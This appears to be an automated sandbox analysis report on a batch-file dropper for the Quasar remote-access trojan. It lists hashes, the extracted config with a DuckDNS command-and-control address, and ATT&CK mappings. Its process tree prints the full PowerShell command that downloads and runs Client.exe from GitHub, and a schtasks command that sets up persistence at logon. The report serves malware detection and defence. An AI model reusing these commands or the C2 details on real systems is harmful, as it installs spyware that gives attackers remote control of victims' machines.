quasar | 624dddefe23183f69741089a3a0a54a6d5fe8b95d12479dba2a5972880c7013a

General

Target

Test.bat
Size

186B
MD5

9c4d95c3db51f66fed113f3f97c634ed
SHA1

4aa3b2737d2883c3546ba198dbfe01354ed280b3
SHA256

624dddefe23183f69741089a3a0a54a6d5fe8b95d12479dba2a5972880c7013a
SHA512

ed3e20e2123239d57b8e9da07c576cd9255ab386ba33025077ce7eb125a1a018375381c1886a1312d478930b4844149ece2f8f21f0972c200f154b5b5790cf9b

Score

10^/10

quasar astro-1 execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Astro-1

C2

arthurus36.duckdns.org:5555

Mutex

ad7cd985-5e2e-45a3-9246-b82449c7c4d8

Attributes

encryption_key
6314C8C60AA1035CEB920FD38F0342E398BAF5D0
install_name
cmdprmpt.exe
log_directory
Logs
reconnect_delay
3000
startup_key
systemdex

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
C:\Windows\Client.exe	family_quasar
behavioral2/memory/2716-29-0x0000000000620000-0x0000000000944000-memory.dmp	family_quasar

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

4 3528 powershell.exe
8 3528 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Powershell Invoke Web Request.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

3528 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

Client.execmdprmpt.exe

pid process

2716 Client.exe
3780 cmdprmpt.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

7 raw.githubusercontent.com
8 raw.githubusercontent.com

flow	pid	process
4	3528	powershell.exe
8	3528	powershell.exe

pid	process
3528	powershell.exe

pid	process
2716	Client.exe
3780	cmdprmpt.exe

flow	ioc
7	raw.githubusercontent.com
8	raw.githubusercontent.com

Drops file in System32 directory 3 IoCs

Processes:

Client.execmdprmpt.exe

description	ioc	process
File opened for modification	C:\Windows\system32\cmdprmpt.exe	Client.exe
File opened for modification	C:\Windows\system32\cmdprmpt.exe	cmdprmpt.exe
File created	C:\Windows\system32\cmdprmpt.exe	Client.exe

Drops file in Windows directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\Client.exe powershell.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1332 schtasks.exe
4448 schtasks.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

3528 powershell.exe
3528 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exeClient.execmdprmpt.exe

description pid process

Token: SeDebugPrivilege 3528 powershell.exe
Token: SeDebugPrivilege 2716 Client.exe
Token: SeDebugPrivilege 3780 cmdprmpt.exe

description	ioc	process
File created	C:\Windows\Client.exe	powershell.exe

pid	process
1332	schtasks.exe
4448	schtasks.exe

pid	process
3528	powershell.exe
3528	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3528	powershell.exe
Token: SeDebugPrivilege	2716	Client.exe
Token: SeDebugPrivilege	3780	cmdprmpt.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

cmd.exepowershell.exeClient.execmdprmpt.exe

description	pid	process	target process
PID 4480 wrote to memory of 3528	4480	cmd.exe	powershell.exe
PID 4480 wrote to memory of 3528	4480	cmd.exe	powershell.exe
PID 3528 wrote to memory of 2716	3528	powershell.exe	Client.exe
PID 3528 wrote to memory of 2716	3528	powershell.exe	Client.exe
PID 2716 wrote to memory of 4448	2716	Client.exe	schtasks.exe
PID 2716 wrote to memory of 4448	2716	Client.exe	schtasks.exe
PID 2716 wrote to memory of 3780	2716	Client.exe	cmdprmpt.exe
PID 2716 wrote to memory of 3780	2716	Client.exe	cmdprmpt.exe
PID 3780 wrote to memory of 1332	3780	cmdprmpt.exe	schtasks.exe
PID 3780 wrote to memory of 1332	3780	cmdprmpt.exe	schtasks.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Test.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4480

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command cd C:\Windows mkdir .temp2 Invoke-WebRequest https://github.com/1048discord/RATCLIENT/raw/main/Beta.exe -OutFile Client.exe start Client.exe
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3528

C:\Windows\Client.exe
"C:\Windows\Client.exe"
3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2716

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "systemdex" /sc ONLOGON /tr "C:\Windows\system32\cmdprmpt.exe" /rl HIGHEST /f
4⤵
- Creates scheduled task(s)
PID:4448

C:\Windows\system32\cmdprmpt.exe
"C:\Windows\system32\cmdprmpt.exe"
4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3780

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "systemdex" /sc ONLOGON /tr "C:\Windows\system32\cmdprmpt.exe" /rl HIGHEST /f
5⤵
- Creates scheduled task(s)
PID:1332

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5072 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:8
1⤵
PID:1556

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

Scheduled Task/Job

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vahkfwcu.123.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\Client.exe

Filesize
3.1MB

MD5
bb26a2979d9a61725f910422403ed4dd

SHA1
b46d4a3a7f7253e1d7268c060702d301ebb36dd6

SHA256
fb80d28a129184b6a273bd893aeee80765b6ec3eb617d90c6d32d0738bcbbfef

SHA512
dfa1d068282cae728f6adf890065c0dcecbf9215646f50313d995afd209f52c07f3fd8e1e414c8712af1e2b5306ef453a9b6419f1c574dbd445acbc276426200

Download Submit
memory/2716-39-0x00007FFA05EA0000-0x00007FFA06961000-memory.dmp

Filesize
10.8MB

Download
memory/2716-32-0x00007FFA05EA0000-0x00007FFA06961000-memory.dmp

Filesize
10.8MB

Download
memory/2716-31-0x00007FFA05EA0000-0x00007FFA06961000-memory.dmp

Filesize
10.8MB

Download
memory/2716-29-0x0000000000620000-0x0000000000944000-memory.dmp

Filesize
3.1MB

Download
memory/3528-12-0x00007FFA05EA0000-0x00007FFA06961000-memory.dmp

Filesize
10.8MB

Download
memory/3528-27-0x00007FFA05EA3000-0x00007FFA05EA5000-memory.dmp

Filesize
8KB

Download
memory/3528-30-0x00007FFA05EA0000-0x00007FFA06961000-memory.dmp

Filesize
10.8MB

Download
memory/3528-13-0x00007FFA05EA0000-0x00007FFA06961000-memory.dmp

Filesize
10.8MB

Download
memory/3528-28-0x00007FFA05EA0000-0x00007FFA06961000-memory.dmp

Filesize
10.8MB

Download
memory/3528-0-0x00007FFA05EA3000-0x00007FFA05EA5000-memory.dmp

Filesize
8KB

Download
memory/3528-11-0x00007FFA05EA0000-0x00007FFA06961000-memory.dmp

Filesize
10.8MB

Download
memory/3528-10-0x00000261518B0000-0x00000261518D2000-memory.dmp

Filesize
136KB

Download
memory/3780-40-0x0000000003110000-0x0000000003160000-memory.dmp

Filesize
320KB

Download
memory/3780-41-0x000000001C250000-0x000000001C302000-memory.dmp

Filesize
712KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads